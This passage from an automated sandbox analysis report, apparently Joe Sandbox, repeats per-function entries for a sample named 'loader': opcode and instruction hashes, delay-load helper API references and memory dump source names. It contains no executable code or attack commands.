              • Opcode ID: 0d1724b9a73d6e6c6c86e788562b0e09ad2e28b372106c8698807c5361f426b1
              • Instruction ID: ef15d8f4086031eba2ff08f0ccdfb8319eafdfc311ef25e88dde85b7179b1fea
              • Opcode Fuzzy Hash: 0d1724b9a73d6e6c6c86e788562b0e09ad2e28b372106c8698807c5361f426b1
              • Instruction Fuzzy Hash: F3B012E126D4026CB10C61447E42D76028CC4C3B10770803AF10AE00C0F7505DC70431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 50844b8bff5c72e80f16365cc907f6fb950e7260aa00a383e849058cd10d9bdc
              • Instruction ID: dd8a87da77d2daac5f5d70d02baff653adf0398bdaba4463d3b7791bc3809844
              • Opcode Fuzzy Hash: 50844b8bff5c72e80f16365cc907f6fb950e7260aa00a383e849058cd10d9bdc
              • Instruction Fuzzy Hash: 31B0129126C0026CB10CB1457E12E7F024CC4C4B14330853BF10DE1044E7504C8B4432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b877c337b23af4e4e4798b1a2f72c1241e234a6475b798f9b9479386c139a24b
              • Instruction ID: a97ac234fdd1b32d0f3648a29bd46d6396188f6b6ac2c0e7faf22a7f66b14814
              • Opcode Fuzzy Hash: b877c337b23af4e4e4798b1a2f72c1241e234a6475b798f9b9479386c139a24b
              • Instruction Fuzzy Hash: D5B012A126D002ECB10CB1457D12D7B024CC4C0B10330C13BF40DD1084E7544D8A4432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bf6fc9335ecc201f18d0e77fa1d44a478ca58fc390a90bbb4a72cdb0e1673c27
              • Instruction ID: dbdac48488b02f2e4b11405557d6a0dd232075411739ff1e8277d2bdb8533065
              • Opcode Fuzzy Hash: bf6fc9335ecc201f18d0e77fa1d44a478ca58fc390a90bbb4a72cdb0e1673c27
              • Instruction Fuzzy Hash: 94B012912AC1026CF10CB1457D52E7B024CD4C0B10330413BF00DD1044E7504C864532
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ada8c55a9645e8f16a999a519d7586f2522cbf8cccd903ca56bc9d0e16de4dd9
              • Instruction ID: 1d259d5e0da615f5e20c1ac7cf7435e113905e607fbe34564966e2806170666b
              • Opcode Fuzzy Hash: ada8c55a9645e8f16a999a519d7586f2522cbf8cccd903ca56bc9d0e16de4dd9
              • Instruction Fuzzy Hash: 81B0129636C0026CB10C511C3D07EB6021CD0C1B10331403AF10BE0040EB504C8A4031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: de026a2fdf0467e46bd938f7b7c20f228d554ee278c104457faf3d0f67e8a379
              • Instruction ID: ea96e92c80024eb412fce1a2193c2f620b23884e9ac5c86a56acbea81628da79
              • Opcode Fuzzy Hash: de026a2fdf0467e46bd938f7b7c20f228d554ee278c104457faf3d0f67e8a379
              • Instruction Fuzzy Hash: 0EB0129637C1077CB20C11083D07CB7021CC0C1B10332413AF106F0040EB944CCA4031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1db345e5bc47aa01b036141edf75ab7cfa0fcb3f3aa93ae036b29806c9d29e9a
              • Instruction ID: b1c27615aac8116cc4e5bee78e7750556e61f1bb0e5dc6a190f5b887d171ef99
              • Opcode Fuzzy Hash: 1db345e5bc47aa01b036141edf75ab7cfa0fcb3f3aa93ae036b29806c9d29e9a
              • Instruction Fuzzy Hash: 7AB0129636C0037CB10C510C3E07DB7021CC0C1B10332803AF20AE0040EB944C874031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e22ad16179c8e57bc37a2986149f91f344bb6f80308d3fff2990d7f6845be979
              • Instruction ID: 9d42c1b6f4b9634df75921da51a42b5f3d1e058ecb1c3e7c4533df45d252857b
              • Opcode Fuzzy Hash: e22ad16179c8e57bc37a2986149f91f344bb6f80308d3fff2990d7f6845be979
              • Instruction Fuzzy Hash: 92B0129636C003ACB10C510C3D07DB7022CC0C1B10332813AF50AE1080EB944C8A4031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 21e1d02070497de4743e61b46cdd7c6d2946f501c38c80c80e865cd340915293
              • Instruction ID: e63b8c8bf009febb9fa3cebe54b892206cc7292f113ef15805569d3c08f3ccb6
              • Opcode Fuzzy Hash: 21e1d02070497de4743e61b46cdd7c6d2946f501c38c80c80e865cd340915293
              • Instruction Fuzzy Hash: 30B0129626C2027DF10C21047F02EB6022CC1C1B203314A3EF209F0040E7805CC65431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 005d5c42a484b64c1476da71f0e5bc140c5c342f70e5652c1463e67ab49349b1
              • Instruction ID: 4ed88aaf36276c21ea554294f13b5a8c8cdc5cb4e05042dc5493ca3da31606d5
              • Opcode Fuzzy Hash: 005d5c42a484b64c1476da71f0e5bc140c5c342f70e5652c1463e67ab49349b1
              • Instruction Fuzzy Hash: 4BB0129626C1026CF10C61087D02FB6022CC0C6B20330893EF60DE0080E7805C864431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f01cf74a85a77a729ab97fe27c8e1bc8e7e0412558a880031632f200cdff2428
              • Instruction ID: 3870883f4c7a04e2706f657b33f96c3e1f7c86c5ac9a794f15f930bdf7645ec0
              • Opcode Fuzzy Hash: f01cf74a85a77a729ab97fe27c8e1bc8e7e0412558a880031632f200cdff2428
              • Instruction Fuzzy Hash: 0AB0129627C2026CF10C61087D02FB6022CC0C1B20330493FF20DE0040E7805C864431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7eb1cf15feb423763ee6712b4006696e75406bb2759b7c3a45406b350e265426
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 7eb1cf15feb423763ee6712b4006696e75406bb2759b7c3a45406b350e265426
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bd507417c4ed9196eabae2eae28984883534113e1210dce44e556b5f00094b93
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: bd507417c4ed9196eabae2eae28984883534113e1210dce44e556b5f00094b93
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4b7d3e71fe92e91eaec6e93e7fd4de36dfd020d005ea266b7c5c708820746c91
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 4b7d3e71fe92e91eaec6e93e7fd4de36dfd020d005ea266b7c5c708820746c91
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ed2a744de7ee1e3dd3c26cb9699d5cb4ad96475aabe883d904318843b8868c20
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: ed2a744de7ee1e3dd3c26cb9699d5cb4ad96475aabe883d904318843b8868c20
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d758ad2151fdea0549dd94834e098c4f2d39f4079f4c1cd33237e0d33b793ff5
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: d758ad2151fdea0549dd94834e098c4f2d39f4079f4c1cd33237e0d33b793ff5
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9d74cbb0f780cc2658d9f1c9fdb860e654351f924b571a472e9f63b33efc126e
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 9d74cbb0f780cc2658d9f1c9fdb860e654351f924b571a472e9f63b33efc126e
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
